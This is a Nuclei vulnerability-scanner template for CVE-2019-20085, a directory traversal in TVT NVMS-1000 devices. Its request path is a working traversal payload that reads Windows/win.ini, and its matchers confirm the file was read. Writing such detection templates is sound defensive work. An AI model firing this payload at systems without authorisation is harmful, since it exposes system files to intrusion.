my-nuclei-templates/CVE-2019-20085.yaml

27 lines
624 B
YAML
Raw Normal View History

2021-07-20 23:36:53 +00:00
id: CVE-2019-20085
info:
name: TVT NVMS 1000 - Directory Traversal
author: daffainfo
severity: high
description: TVT NVMS-1000 devices allow GET /.. Directory Traversal
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2019-20085
- https://www.exploit-db.com/exploits/48311
tags: cve,cve2019,iot,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/../../../../../../../../../../../Windows/win.ini"
matchers-condition: and
matchers:
- type: regex
regex:
- "\\[(font|extension|file)s\\]"
part: body
- type: status
status:
- 200